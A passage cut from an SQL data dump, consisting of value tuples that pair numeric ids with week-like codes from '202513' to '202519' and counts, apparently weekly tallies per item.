341,1,'202513',5),(4368,1,'202513',5),(4408,1,'202513',5),(4412,1,'202513',5),(4432,1,'202513',5),(4517,1,'202513',5),(4645,1,'202513',5),(4694,1,'202513',5),(4709,1,'202513',5),(4759,1,'202513',5),(4762,1,'202513',5),(4776,1,'202513',5),(5037,1,'202513',5),(5157,1,'202513',5),(5259,1,'202513',5),(5268,1,'202513',5),(5271,1,'202513',5),(5292,1,'202513',5),(5317,1,'202513',5),(472,1,'202513',6),(474,1,'202513',6),(481,1,'202513',6),(486,1,'202513',6),(1606,1,'202513',6),(1722,1,'202513',6),(2152,1,'202513',6),(2178,1,'202513',6),(2252,1,'202513',6),(2503,1,'202513',6),(2609,1,'202513',6),(2751,1,'202513',6),(2911,1,'202513',6),(3005,1,'202513',6),(3027,1,'202513',6),(3041,1,'202513',6),(3079,1,'202513',6),(3746,1,'202513',6),(4396,1,'202513',6),(4416,1,'202513',6),(4454,1,'202513',6),(4551,1,'202513',6),(4668,1,'202513',6),(4712,1,'202513',6),(4768,1,'202513',6),(4976,1,'202513',6),(5101,1,'202513',6),(5128,1,'202513',6),(5134,1,'202513',6),(5334,1,'202513',6),(1772,1,'202513',7),(3063,1,'202513',7),(3278,1,'202513',7),(3752,1,'202513',7),(5028,1,'202513',7),(335,1,'202513',8),(1584,1,'202513',8),(1586,1,'202513',8),(1602,1,'202513',8),(1614,1,'202513',8),(4657,1,'202513',8),(5076,1,'202513',8),(5140,1,'202513',8),(5330,1,'202513',8),(471,1,'202513',9),(68,1,'202513',10),(3060,1,'202513',10),(1582,1,'202513',11),(2813,1,'202513',12),(72,1,'202513',17),(3247,1,'202513',17),(80,1,'202513',32),(3781,1,'202513',34),(9,1,'202513',31184),(84,1,'202514',1),(467,1,'202514',1),(477,1,'202514',1),(487,1,'202514',1),(1590,1,'202514',1),(1594,1,'202514',1),(1695,1,'202514',1),(1697,1,'202514',1),(1699,1,'202514',1),(1718,1,'202514',1),(2248,1,'202514',1),(2297,1,'202514',1),(2769,1,'202514',1),(2993,1,'202514',1),(3030,1,'202514',1),(3038,1,'202514',1),(3083,1,'202514',1),(3104,1,'202514',1),(3124,1,'202514',1),(3127,1,'202514',1),(3245,1,'202514',1),(3273,1,'202514',1),(3316,1,'202514',1),(3724,1,'202514',1),(4301,1,'202514',1),(4332,1,'202514',1),(4338,1,'202514',1),(4391,1,'202514',1),(4428,1,'202514',1),(4444,1,'202514',1),(4457,1,'202514',1),(4514,1,'202514',1),(4524,1,'202514',1),(4542,1,'202514',1),(4612,1,'202514',1),(4660,1,'202514',1),(4677,1,'202514',1),(4685,1,'202514',1),(4691,1,'202514',1),(4771,1,'202514',1),(4792,1,'202514',1),(4797,1,'202514',1),(4862,1,'202514',1),(4977,1,'202514',1),(5033,1,'202514',1),(5122,1,'202514',1),(5125,1,'202514',1),(5137,1,'202514',1),(5314,1,'202514',1),(5320,1,'202514',1),(5356,1,'202514',1),(5374,1,'202514',1),(89,1,'202514',2),(106,1,'202514',2),(108,1,'202514',2),(335,1,'202514',2),(476,1,'202514',2),(478,1,'202514',2),(479,1,'202514',2),(480,1,'202514',2),(481,1,'202514',2),(1588,1,'202514',2),(1592,1,'202514',2),(1596,1,'202514',2),(1604,1,'202514',2),(1606,1,'202514',2),(1701,1,'202514',2),(1705,1,'202514',2),(1715,1,'202514',2),(1722,1,'202514',2),(1739,1,'202514',2),(1745,1,'202514',2),(1749,1,'202514',2),(1751,1,'202514',2),(1766,1,'202514',2),(1772,1,'202514',2),(1774,1,'202514',2),(2152,1,'202514',2),(2156,1,'202514',2),(2159,1,'202514',2),(2503,1,'202514',2),(2558,1,'202514',2),(2658,1,'202514',2),(2751,1,'202514',2),(2809,1,'202514',2),(2904,1,'202514',2),(2911,1,'202514',2),(2956,1,'202514',2),(2965,1,'202514',2),(2991,1,'202514',2),(3006,1,'202514',2),(3034,1,'202514',2),(3041,1,'202514',2),(3063,1,'202514',2),(3079,1,'202514',2),(3096,1,'202514',2),(3097,1,'202514',2),(3117,1,'202514',2),(3229,1,'202514',2),(3240,1,'202514',2),(3243,1,'202514',2),(3253,1,'202514',2),(3261,1,'202514',2),(3263,1,'202514',2),(3265,1,'202514',2),(3267,1,'202514',2),(3269,1,'202514',2),(3275,1,'202514',2),(3278,1,'202514',2),(3287,1,'202514',2),(3438,1,'202514',2),(3482,1,'202514',2),(3498,1,'202514',2),(3541,1,'202514',2),(3710,1,'202514',2),(3742,1,'202514',2),(3746,1,'202514',2),(3752,1,'202514',2),(4323,1,'202514',2),(4335,1,'202514',2),(4363,1,'202514',2),(4368,1,'202514',2),(4387,1,'202514',2),(4404,1,'202514',2),(4517,1,'202514',2),(4551,1,'202514',2),(4582,1,'202514',2),(4587,1,'202514',2),(4645,1,'202514',2),(4648,1,'202514',2),(4663,1,'202514',2),(4681,1,'202514',2),(4703,1,'202514',2),(4709,1,'202514',2),(4712,1,'202514',2),(4744,1,'202514',2),(4750,1,'202514',2),(4753,1,'202514',2),(4762,1,'202514',2),(4776,1,'202514',2),(4802,1,'202514',2),(4988,1,'202514',2),(4996,1,'202514',2),(5028,1,'202514',2),(5071,1,'202514',2),(5101,1,'202514',2),(5131,1,'202514',2),(5134,1,'202514',2),(5140,1,'202514',2),(5157,1,'202514',2),(5259,1,'202514',2),(5264,1,'202514',2),(5271,1,'202514',2),(5276,1,'202514',2),(5292,1,'202514',2),(5295,1,'202514',2),(5317,1,'202514',2),(5323,1,'202514',2),(5330,1,'202514',2),(5353,1,'202514',2),(76,1,'202514',3),(87,1,'202514',3),(110,1,'202514',3),(468,1,'202514',3),(470,1,'202514',3),(474,1,'202514',3),(486,1,'202514',3),(570,1,'202514',3),(1544,1,'202514',3),(1584,1,'202514',3),(1586,1,'202514',3),(1614,1,'202514',3),(1711,1,'202514',3),(1713,1,'202514',3),(1730,1,'202514',3),(1747,1,'202514',3),(1778,1,'202514',3),(2801,1,'202514',3),(2813,1,'202514',3),(2989,1,'202514',3),(3023,1,'202514',3),(3247,1,'202514',3),(3259,1,'202514',3),(3280,1,'202514',3),(3290,1,'202514',3),(3731,1,'202514',3),(4341,1,'202514',3),(4382,1,'202514',3),(4396,1,'202514',3),(4408,1,'202514',3),(4412,1,'202514',3),(4416,1,'202514',3),(4432,1,'202514',3),(4668,1,'202514',3),(4674,1,'202514',3),(4688,1,'202514',3),(4694,1,'202514',3),(4768,1,'202514',3),(4976,1,'202514',3),(5037,1,'202514',3),(5080,1,'202514',3),(5128,1,'202514',3),(5153,1,'202514',3),(5268,1,'202514',3),(5304,1,'202514',3),(91,1,'202514',4),(472,1,'202514',4),(1582,1,'202514',4),(1602,1,'202514',4),(1724,1,'202514',4),(1770,1,'202514',4),(2178,1,'202514',4),(3027,1,'202514',4),(3066,1,'202514',4),(3313,1,'202514',4),(3531,1,'202514',4),(4329,1,'202514',4),(4420,1,'202514',4),(4759,1,'202514',4),(5020,1,'202514',4),(5076,1,'202514',4),(5334,1,'202514',4),(484,1,'202514',5),(1600,1,'202514',5),(2252,1,'202514',5),(3072,1,'202514',5),(72,1,'202514',6),(473,1,'202514',6),(2309,1,'202514',6),(3005,1,'202514',6),(3764,1,'202514',6),(4454,1,'202514',6),(74,1,'202514',7),(1608,1,'202514',7),(3060,1,'202514',7),(3107,1,'202514',7),(4275,1,'202514',7),(1612,1,'202514',8),(2457,1,'202514',8),(2617,1,'202514',8),(2609,1,'202514',11),(68,1,'202514',16),(80,1,'202514',20),(3781,1,'202514',22),(9,1,'202514',25751),(74,1,'202515',1),(76,1,'202515',1),(89,1,'202515',1),(102,1,'202515',1),(108,1,'202515',1),(110,1,'202515',1),(468,1,'202515',1),(474,1,'202515',1),(479,1,'202515',1),(480,1,'202515',1),(488,1,'202515',1),(1598,1,'202515',1),(1703,1,'202515',1),(1707,1,'202515',1),(1720,1,'202515',1),(1726,1,'202515',1),(1728,1,'202515',1),(1741,1,'202515',1),(1774,1,'202515',1),(2063,1,'202515',1),(2457,1,'202515',1),(2658,1,'202515',1),(2801,1,'202515',1),(3027,1,'202515',1),(3034,1,'202515',1),(3038,1,'202515',1),(3092,1,'202515',1),(3109,1,'202515',1),(3127,1,'202515',1),(3243,1,'202515',1),(3247,1,'202515',1),(3253,1,'202515',1),(3267,1,'202515',1),(3273,1,'202515',1),(3534,1,'202515',1),(3727,1,'202515',1),(3746,1,'202515',1),(3774,1,'202515',1),(3777,1,'202515',1),(4329,1,'202515',1),(4341,1,'202515',1),(4387,1,'202515',1),(4424,1,'202515',1),(4428,1,'202515',1),(4436,1,'202515',1),(4448,1,'202515',1),(4556,1,'202515',1),(4645,1,'202515',1),(4648,1,'202515',1),(4660,1,'202515',1),(4674,1,'202515',1),(4681,1,'202515',1),(4691,1,'202515',1),(4694,1,'202515',1),(4712,1,'202515',1),(4741,1,'202515',1),(4750,1,'202515',1),(4762,1,'202515',1),(4858,1,'202515',1),(4866,1,'202515',1),(4883,1,'202515',1),(4888,1,'202515',1),(4893,1,'202515',1),(4897,1,'202515',1),(4988,1,'202515',1),(5050,1,'202515',1),(5080,1,'202515',1),(5122,1,'202515',1),(5131,1,'202515',1),(5248,1,'202515',1),(5268,1,'202515',1),(5276,1,'202515',1),(5289,1,'202515',1),(5295,1,'202515',1),(5314,1,'202515',1),(5320,1,'202515',1),(5353,1,'202515',1),(5363,1,'202515',1),(5374,1,'202515',1),(5378,1,'202515',1),(87,1,'202515',2),(91,1,'202515',2),(467,1,'202515',2),(477,1,'202515',2),(478,1,'202515',2),(485,1,'202515',2),(1602,1,'202515',2),(1610,1,'202515',2),(1695,1,'202515',2),(1699,1,'202515',2),(1701,1,'202515',2),(1734,1,'202515',2),(1743,1,'202515',2),(1780,1,'202515',2),(2252,1,'202515',2),(2503,1,'202515',2),(2609,1,'202515',2),(2751,1,'202515',2),(2769,1,'202515',2),(2775,1,'202515',2),(2965,1,'202515',2),(2991,1,'202515',2),(2993,1,'202515',2),(3030,1,'202515',2),(3041,1,'202515',2),(3107,1,'202515',2),(3117,1,'202515',2),(3124,1,'202515',2),(3275,1,'202515',2),(3438,1,'202515',2),(3482,1,'202515',2),(3486,1,'202515',2),(3489,1,'202515',2),(3721,1,'202515',2),(4301,1,'202515',2),(4335,1,'202515',2),(4363,1,'202515',2),(4408,1,'202515',2),(4416,1,'202515',2),(4454,1,'202515',2),(4514,1,'202515',2),(4524,1,'202515',2),(4529,1,'202515',2),(4587,1,'202515',2),(4668,1,'202515',2),(4722,1,'202515',2),(4759,1,'202515',2),(4768,1,'202515',2),(4874,1,'202515',2),(4930,1,'202515',2),(4976,1,'202515',2),(5024,1,'202515',2),(5042,1,'202515',2),(5076,1,'202515',2),(5125,1,'202515',2),(5128,1,'202515',2),(5134,1,'202515',2),(5146,1,'202515',2),(5157,1,'202515',2),(5256,1,'202515',2),(5264,1,'202515',2),(5334,1,'202515',2),(471,1,'202515',3),(484,1,'202515',3),(486,1,'202515',3),(1592,1,'202515',3),(1596,1,'202515',3),(1614,1,'202515',3),(1722,1,'202515',3),(1739,1,'202515',3),(2148,1,'202515',3),(2297,1,'202515',3),(3006,1,'202515',3),(3063,1,'202515',3),(3066,1,'202515',3),(3087,1,'202515',3),(3090,1,'202515',3),(3280,1,'202515',3),(3290,1,'202515',3),(3498,1,'202515',3),(3724,1,'202515',3),(3742,1,'202515',3),(4332,1,'202515',3),(4542,1,'202515',3),(4677,1,'202515',3),(4776,1,'202515',3),(4996,1,'202515',3),(5101,1,'202515',3),(5137,1,'202515',3),(5259,1,'202515',3),(5280,1,'202515',3),(5330,1,'202515',3),(84,1,'202515',4),(335,1,'202515',4),(570,1,'202515',4),(1594,1,'202515',4),(1600,1,'202515',4),(1608,1,'202515',4),(1612,1,'202515',4),(1732,1,'202515',4),(1749,1,'202515',4),(2309,1,'202515',4),(2813,1,'202515',4),(2904,1,'202515',4),(3023,1,'202515',4),(3226,1,'202515',4),(3316,1,'202515',4),(3738,1,'202515',4),(4391,1,'202515',4),(4396,1,'202515',4),(4432,1,'202515',4),(72,1,'202515',5),(470,1,'202515',5),(3069,1,'202515',5),(3261,1,'202515',5),(3731,1,'202515',5),(4551,1,'202515',5),(4566,1,'202515',5),(473,1,'202515',6),(1711,1,'202515',6),(2558,1,'202515',6),(2617,1,'202515',6),(3004,1,'202515',6),(4400,1,'202515',6),(4657,1,'202515',6),(4771,1,'202515',6),(1724,1,'202515',7),(2154,1,'202515',7),(3072,1,'202515',7),(3005,1,'202515',8),(3079,1,'202515',8),(4275,1,'202515',8),(4420,1,'202515',8),(1582,1,'202515',10),(1766,1,'202515',11),(3764,1,'202515',11),(4412,1,'202515',14),(1586,1,'202515',17),(3781,1,'202515',18),(80,1,'202515',27),(68,1,'202515',29),(9,1,'202515',26381),(74,1,'202516',1),(468,1,'202516',1),(477,1,'202516',1),(482,1,'202516',1),(487,1,'202516',1),(1544,1,'202516',1),(1598,1,'202516',1),(1604,1,'202516',1),(1608,1,'202516',1),(1610,1,'202516',1),(1612,1,'202516',1),(1614,1,'202516',1),(1695,1,'202516',1),(1705,1,'202516',1),(1707,1,'202516',1),(1711,1,'202516',1),(1720,1,'202516',1),(1724,1,'202516',1),(1774,1,'202516',1),(1782,1,'202516',1),(2150,1,'202516',1),(2248,1,'202516',1),(2296,1,'202516',1),(2457,1,'202516',1),(2704,1,'202516',1),(2775,1,'202516',1),(2804,1,'202516',1),(2813,1,'202516',1),(2904,1,'202516',1),(2956,1,'202516',1),(3069,1,'202516',1),(3072,1,'202516',1),(3079,1,'202516',1),(3092,1,'202516',1),(3097,1,'202516',1),(3102,1,'202516',1),(3245,1,'202516',1),(3271,1,'202516',1),(3275,1,'202516',1),(3290,1,'202516',1),(3307,1,'202516',1),(3438,1,'202516',1),(3482,1,'202516',1),(3498,1,'202516',1),(3531,1,'202516',1),(3710,1,'202516',1),(3727,1,'202516',1),(3777,1,'202516',1),(4238,1,'202516',1),(4341,1,'202516',1),(4382,1,'202516',1),(4428,1,'202516',1),(4457,1,'202516',1),(4520,1,'202516',1),(4546,1,'202516',1),(4556,1,'202516',1),(4566,1,'202516',1),(4648,1,'202516',1),(4654,1,'202516',1),(4657,1,'202516',1),(4663,1,'202516',1),(4668,1,'202516',1),(4685,1,'202516',1),(4697,1,'202516',1),(4712,1,'202516',1),(4747,1,'202516',1),(4756,1,'202516',1),(4762,1,'202516',1),(4866,1,'202516',1),(4883,1,'202516',1),(4888,1,'202516',1),(4897,1,'202516',1),(4988,1,'202516',1),(5028,1,'202516',1),(5033,1,'202516',1),(5037,1,'202516',1),(5067,1,'202516',1),(5128,1,'202516',1),(5131,1,'202516',1),(5134,1,'202516',1),(5140,1,'202516',1),(5153,1,'202516',1),(5163,1,'202516',1),(5304,1,'202516',1),(5317,1,'202516',1),(5323,1,'202516',1),(5326,1,'202516',1),(5330,1,'202516',1),(5334,1,'202516',1),(5353,1,'202516',1),(5363,1,'202516',1),(5374,1,'202516',1),(5383,1,'202516',1),(76,1,'202516',2),(84,1,'202516',2),(89,1,'202516',2),(102,1,'202516',2),(106,1,'202516',2),(478,1,'202516',2),(481,1,'202516',2),(483,1,'202516',2),(485,1,'202516',2),(1701,1,'202516',2),(1728,1,'202516',2),(1737,1,'202516',2),(1743,1,'202516',2),(2252,1,'202516',2),(2297,1,'202516',2),(2558,1,'202516',2),(2751,1,'202516',2),(2801,1,'202516',2),(2991,1,'202516',2),(3027,1,'202516',2),(3030,1,'202516',2),(3045,1,'202516',2),(3104,1,'202516',2),(3117,1,'202516',2),(3229,1,'202516',2),(3240,1,'202516',2),(3249,1,'202516',2),(3253,1,'202516',2),(3261,1,'202516',2),(3265,1,'202516',2),(3278,1,'202516',2),(3287,1,'202516',2),(3313,1,'202516',2),(3479,1,'202516',2),(3489,1,'202516',2),(3724,1,'202516',2),(3735,1,'202516',2),(3738,1,'202516',2),(3749,1,'202516',2),(3774,1,'202516',2),(4357,1,'202516',2),(4363,1,'202516',2),(4377,1,'202516',2),(4436,1,'202516',2),(4517,1,'202516',2),(4551,1,'202516',2),(4608,1,'202516',2),(4645,1,'202516',2),(4651,1,'202516',2),(4674,1,'202516',2),(4691,1,'202516',2),(4700,1,'202516',2),(4722,1,'202516',2),(4776,1,'202516',2),(4792,1,'202516',2),(4858,1,'202516',2),(4870,1,'202516',2),(5024,1,'202516',2),(5046,1,'202516',2),(5058,1,'202516',2),(5062,1,'202516',2),(5101,1,'202516',2),(5248,1,'202516',2),(5259,1,'202516',2),(5264,1,'202516',2),(5289,1,'202516',2),(5295,1,'202516',2),(5307,1,'202516',2),(469,1,'202516',3),(484,1,'202516',3),(1584,1,'202516',3),(1588,1,'202516',3),(1600,1,'202516',3),(1713,1,'202516',3),(1726,1,'202516',3),(1749,1,'202516',3),(1770,1,'202516',3),(1778,1,'202516',3),(1780,1,'202516',3),(2293,1,'202516',3),(2503,1,'202516',3),(2993,1,'202516',3),(3006,1,'202516',3),(3023,1,'202516',3),(3063,1,'202516',3),(3226,1,'202516',3),(3273,1,'202516',3),(3541,1,'202516',3),(3764,1,'202516',3),(4301,1,'202516',3),(4338,1,'202516',3),(4542,1,'202516',3),(4976,1,'202516',3),(4996,1,'202516',3),(5301,1,'202516',3),(5356,1,'202516',3),(470,1,'202516',4),(570,1,'202516',4),(1596,1,'202516',4),(1606,1,'202516',4),(1709,1,'202516',4),(1718,1,'202516',4),(1734,1,'202516',4),(1739,1,'202516',4),(1776,1,'202516',4),(2161,1,'202516',4),(2617,1,'202516',4),(3004,1,'202516',4),(3285,1,'202516',4),(4332,1,'202516',4),(4391,1,'202516',4),(4416,1,'202516',4),(4694,1,'202516',4),(471,1,'202516',5),(473,1,'202516',5),(479,1,'202516',5),(488,1,'202516',5),(1703,1,'202516',5),(3083,1,'202516',5),(3247,1,'202516',5),(3251,1,'202516',5),(3263,1,'202516',5),(3746,1,'202516',5),(4454,1,'202516',5),(4759,1,'202516',5),(5076,1,'202516',5),(72,1,'202516',6),(1602,1,'202516',6),(2154,1,'202516',6),(2309,1,'202516',6),(2658,1,'202516',6),(4524,1,'202516',6),(4874,1,'202516',6),(5054,1,'202516',6),(5071,1,'202516',6),(1582,1,'202516',7),(2165,1,'202516',7),(2911,1,'202516',7),(3731,1,'202516',7),(4412,1,'202516',7),(1586,1,'202516',8),(3243,1,'202516',8),(3771,1,'202516',8),(4420,1,'202516',8),(2609,1,'202516',9),(3066,1,'202516',9),(3781,1,'202516',10),(1766,1,'202516',11),(3060,1,'202516',19),(80,1,'202516',29),(68,1,'202516',38),(9,1,'202516',40289),(470,1,'202517',1),(473,1,'202517',1),(482,1,'202517',1),(484,1,'202517',1),(487,1,'202517',1),(1584,1,'202517',1),(1612,1,'202517',1),(1695,1,'202517',1),(1697,1,'202517',1),(1701,1,'202517',1),(1705,1,'202517',1),(1737,1,'202517',1),(1741,1,'202517',1),(1768,1,'202517',1),(2704,1,'202517',1),(2751,1,'202517',1),(2769,1,'202517',1),(2775,1,'202517',1),(2809,1,'202517',1),(2813,1,'202517',1),(2911,1,'202517',1),(2964,1,'202517',1),(3004,1,'202517',1),(3034,1,'202517',1),(3045,1,'202517',1),(3072,1,'202517',1),(3083,1,'202517',1),(3087,1,'202517',1),(3107,1,'202517',1),(3124,1,'202517',1),(3226,1,'202517',1),(3278,1,'202517',1),(3282,1,'202517',1),(3297,1,'202517',1),(3498,1,'202517',1),(3710,1,'202517',1),(3721,1,'202517',1),(3724,1,'202517',1),(3727,1,'202517',1),(3771,1,'202517',1),(3777,1,'202517',1),(4301,1,'202517',1),(4338,1,'202517',1),(4363,1,'202517',1),(4377,1,'202517',1),(4432,1,'202517',1),(4454,1,'202517',1),(4520,1,'202517',1),(4529,1,'202517',1),(4651,1,'202517',1),(4657,1,'202517',1),(4663,1,'202517',1),(4668,1,'202517',1),(4674,1,'202517',1),(4681,1,'202517',1),(4744,1,'202517',1),(4750,1,'202517',1),(4759,1,'202517',1),(4768,1,'202517',1),(4771,1,'202517',1),(4862,1,'202517',1),(4888,1,'202517',1),(4897,1,'202517',1),(4930,1,'202517',1),(4996,1,'202517',1),(5033,1,'202517',1),(5042,1,'202517',1),(5054,1,'202517',1),(5080,1,'202517',1),(5128,1,'202517',1),(5131,1,'202517',1),(5137,1,'202517',1),(5140,1,'202517',1),(5157,1,'202517',1),(5256,1,'202517',1),(5264,1,'202517',1),(5271,1,'202517',1),(5295,1,'202517',1),(5304,1,'202517',1),(5307,1,'202517',1),(5314,1,'202517',1),(5330,1,'202517',1),(5334,1,'202517',1),(5356,1,'202517',1),(76,1,'202517',2),(87,1,'202517',2),(467,1,'202517',2),(469,1,'202517',2),(472,1,'202517',2),(479,1,'202517',2),(483,1,'202517',2),(570,1,'202517',2),(1544,1,'202517',2),(1588,1,'202517',2),(1592,1,'202517',2),(1606,1,'202517',2),(1610,1,'202517',2),(1614,1,'202517',2),(1709,1,'202517',2),(1715,1,'202517',2),(1718,1,'202517',2),(1728,1,'202517',2),(1739,1,'202517',2),(1749,1,'202517',2),(1780,1,'202517',2),(2148,1,'202517',2),(2154,1,'202517',2),(2161,1,'202517',2),(2178,1,'202517',2),(2248,1,'202517',2),(2309,1,'202517',2),(2457,1,'202517',2),(2609,1,'202517',2),(2617,1,'202517',2),(2804,1,'202517',2),(2904,1,'202517',2),(2989,1,'202517',2),(2993,1,'202517',2),(3023,1,'202517',2),(3030,1,'202517',2),(3090,1,'202517',2),(3092,1,'202517',2),(3117,1,'202517',2),(3127,1,'202517',2),(3229,1,'202517',2),(3245,1,'202517',2),(3257,1,'202517',2),(3261,1,'202517',2),(3275,1,'202517',2),(3290,1,'202517',2),(3482,1,'202517',2),(4238,1,'202517',2),(4326,1,'202517',2),(4329,1,'202517',2),(4341,1,'202517',2),(4368,1,'202517',2),(4373,1,'202517',2),(4396,1,'202517',2),(4400,1,'202517',2),(4542,1,'202517',2),(4660,1,'202517',2),(4697,1,'202517',2),(4706,1,'202517',2),(4741,1,'202517',2),(4753,1,'202517',2),(4756,1,'202517',2),(4792,1,'202517',2),(4980,1,'202517',2),(4988,1,'202517',2),(5024,1,'202517',2),(5101,1,'202517',2),(5125,1,'202517',2),(5259,1,'202517',2),(5310,1,'202517',2),(5353,1,'202517',2),(468,1,'202517',3),(474,1,'202517',3),(480,1,'202517',3),(1582,1,'202517',3),(1608,1,'202517',3),(1711,1,'202517',3),(1724,1,'202517',3),(1726,1,'202517',3),(1730,1,'202517',3),(2658,1,'202517',3),(3006,1,'202517',3),(3066,1,'202517',3),(3109,1,'202517',3),(3240,1,'202517',3),(3251,1,'202517',3),(3489,1,'202517',3),(3534,1,'202517',3),(4420,1,'202517',3),(4436,1,'202517',3),(4566,1,'202517',3),(4648,1,'202517',3),(4866,1,'202517',3),(4893,1,'202517',3),(5020,1,'202517',3),(5037,1,'202517',3),(5046,1,'202517',3),(5076,1,'202517',3),(478,1,'202517',4),(481,1,'202517',4),(1776,1,'202517',4),(2801,1,'202517',4),(3243,1,'202517',4),(3265,1,'202517',4),(3764,1,'202517',4),(4412,1,'202517',4),(4440,1,'202517',4),(5374,1,'202517',4),(89,1,'202517',5),(476,1,'202517',5),(1602,1,'202517',5),(1782,1,'202517',5),(2991,1,'202517',5),(3104,1,'202517',5),(4858,1,'202517',5),(2165,1,'202517',6),(3247,1,'202517',6),(1586,1,'202517',7),(1766,1,'202517',7),(2159,1,'202517',7),(3781,1,'202517',8),(3060,1,'202517',11),(80,1,'202517',32),(1596,1,'202517',32),(68,1,'202517',34),(9,1,'202517',45753),(89,1,'202518',1),(474,1,'202518',1),(483,1,'202518',1),(485,1,'202518',1),(486,1,'202518',1),(488,1,'202518',1),(1588,1,'202518',1),(1598,1,'202518',1),(1612,1,'202518',1),(1614,1,'202518',1),(1695,1,'202518',1),(1718,1,'202518',1),(1722,1,'202518',1),(1724,1,'202518',1),(1739,1,'202518',1),(1749,1,'202518',1),(1768,1,'202518',1),(1772,1,'202518',1),(1778,1,'202518',1),(2165,1,'202518',1),(2178,1,'202518',1),(2248,1,'202518',1),(2457,1,'202518',1),(2704,1,'202518',1),(2748,1,'202518',1),(2804,1,'202518',1),(2993,1,'202518',1),(3041,1,'202518',1),(3072,1,'202518',1),(3083,1,'202518',1),(3243,1,'202518',1),(3249,1,'202518',1),(3257,1,'202518',1),(3265,1,'202518',1),(3271,1,'202518',1),(3278,1,'202518',1),(3282,1,'202518',1),(3287,1,'202518',1),(3438,1,'202518',1),(3479,1,'202518',1),(3489,1,'202518',1),(3534,1,'202518',1),(3752,1,'202518',1),(4329,1,'202518',1),(4373,1,'202518',1),(4408,1,'202518',1),(4416,1,'202518',1),(4420,1,'202518',1),(4424,1,'202518',1),(4428,1,'202518',1),(4432,1,'202518',1),(4444,1,'202518',1),(4520,1,'202518',1),(4524,1,'202518',1),(4645,1,'202518',1),(4674,1,'202518',1),(4703,1,'202518',1),(4706,1,'202518',1),(4747,1,'202518',1),(4756,1,'202518',1),(4768,1,'202518',1),(4802,1,'202518',1),(4858,1,'202518',1),(4977,1,'202518',1),(4983,1,'202518',1),(4988,1,'202518',1),(5024,1,'202518',1),(5050,1,'202518',1),(5071,1,'202518',1),(5080,1,'202518',1),(5101,1,'202518',1),(5122,1,'202518',1),(5140,1,'202518',1),(5264,1,'202518',1),(5271,1,'202518',1),(5289,1,'202518',1),(5292,1,'202518',1),(5301,1,'202518',1),(5304,1,'202518',1),(5317,1,'202518',1),(72,1,'202518',2),(91,1,'202518',2),(102,1,'202518',2),(335,1,'202518',2),(467,1,'202518',2),(472,1,'202518',2),(479,1,'202518',2),(480,1,'202518',2),(481,1,'202518',2),(482,1,'202518',2),(484,1,'202518',2),(1586,1,'202518',2),(1590,1,'202518',2),(1592,1,'202518',2),(1604,1,'202518',2),(1608,1,'202518',2),(1707,1,'202518',2),(1728,1,'202518',2),(1737,1,'202518',2),(1747,1,'202518',2),(1774,1,'202518',2),(1776,1,'202518',2),(2152,1,'202518',2),(2154,1,'202518',2),(2159,1,'202518',2),(2252,1,'202518',2),(2293,1,'202518',2),(2503,1,'202518',2),(2658,1,'202518',2),(2801,1,'202518',2),(2813,1,'202518',2),(2991,1,'202518',2),(3023,1,'202518',2),(3034,1,'202518',2),(3069,1,'202518',2),(3087,1,'202518',2),(3096,1,'202518',2),(3104,1,'202518',2),(3109,1,'202518',2),(3124,1,'202518',2),(3127,1,'202518',2),(3245,1,'202518',2),(3273,1,'202518',2),(3482,1,'202518',2),(3498,1,'202518',2),(3738,1,'202518',2),(3749,1,'202518',2),(3764,1,'202518',2),(3777,1,'202518',2),(4301,1,'202518',2),(4387,1,'202518',2),(4448,1,'202518',2),(4457,1,'202518',2),(4514,1,'202518',2),(4529,1,'202518',2),(4546,1,'202518',2),(4591,1,'202518',2),(4996,1,'202518',2),(5076,1,'202518',2),(5157,1,'202518',2),(5280,1,'202518',2),(108,1,'202518',3),(470,1,'202518',3),(570,1,'202518',3),(1600,1,'202518',3),(1606,1,'202518',3),(1720,1,'202518',3),(1726,1,'202518',3),(1745,1,'202518',3),(1766,1,'202518',3),(1770,1,'202518',3),(2309,1,'202518',3),(3038,1,'202518',3),(3045,1,'202518',3),(3267,1,'202518',3),(3731,1,'202518',3),(4238,1,'202518',3),(4275,1,'202518',3),(4582,1,'202518',3),(5276,1,'202518',3),(468,1,'202518',4),(473,1,'202518',4),(1699,1,'202518',4),(1751,1,'202518',4),(3226,1,'202518',4),(3261,1,'202518',4),(3307,1,'202518',4),(4338,1,'202518',4),(4759,1,'202518',4),(4762,1,'202518',4),(5298,1,'202518',4),(3285,1,'202518',5),(4556,1,'202518',5),(1582,1,'202518',6),(3060,1,'202518',8),(3247,1,'202518',8),(3781,1,'202518',20),(80,1,'202518',23),(68,1,'202518',45),(9,1,'202518',26141),(106,1,'202519',2),(2154,1,'202519',2),(1697,1,'202519',3),(1713,1,'202519',3),(1715,1,'202519',3),(1722,1,'202519',3),(1780,1,'202519',3),(110,1,'202519',4),(1602,1,'202519',4),(1705,1,'202519',4),(1711,1,'202519',4),(1743,1,'202519',4),(1749,1,'202519',4),(1766,1,'202519',4),(2063,1,'202519',4),(2148,1,'202519',4),(2161,1,'202519',4),(2252,1,'202519',4),(3045,1,'202519',4),(3079,1,'202519',4),(3104,1,'202519',4),(3107,1,'202519',4),(3240,1,'202519',4),(3245,1,'202519',4),(3257,1,'202519',4),(3263,1,'202519',4),(3265,1,'202519',4),(4408,1,'202519',4),(4428,1,'202519',4),(4587,1,'202519',4),(4802,1,'202519',4),(4858,1,'202519',4),(4862,1,'202519',4),(4883,1,'202519',4),(484,1,'202519',5),(1701,1,'202519',5),(1707,1,'202519',5),(1720,1,'202519',5),(1728,1,'202519',5),(1737,1,'202519',5),(1739,1,'202519',5),(1747,1,'202519',5),(1751,1,'202519',5),(1774,1,'202519',5),(1782,1,'202519',5),(2150,1,'202519',5),(2152,1,'202519',5),(2248,1,'202519',5),(2965,1,'202519',5),(2993,1,'202519',5),(3005,1,'202519',5),(3041,1,'202519',5),(3092,1,'202519',5),(3102,1,'202519',5),(3259,1,'202519',5),(3261,1,'202519',5),(3271,1,'202519',5),(3282,1,'202519',5),(3285,1,'202519',5),(3307,1,'202519',5),(3313,1,'202519',5),(3749,1,'202519',5),(3764,1,'202519',5),(4363,1,'202519',5),(4368,1,'202519',5),(4377,1,'202519',5),(4382,1,'202519',5),(4396,1,'202519',5),(4404,1,'202519',5),(4432,1,'202519',5),(4444,1,'202519',5),(4546,1,'202519',5),(4700,1,'202519',5),(4706,1,'202519',5),(4792,1,'202519',5),(5020,1,'202519',5),(5024,1,'202519',5),(5028,1,'202519',5),(5037,1,'202519',5),(5042,1,'202519',5),(5050,1,'202519',5),(5163,1,'202519',5),(102,1,'202519',6),(482,1,'202519',6),(1544,1,'202519',6),(1584,1,'202519',6),(1588,1,'202519',6)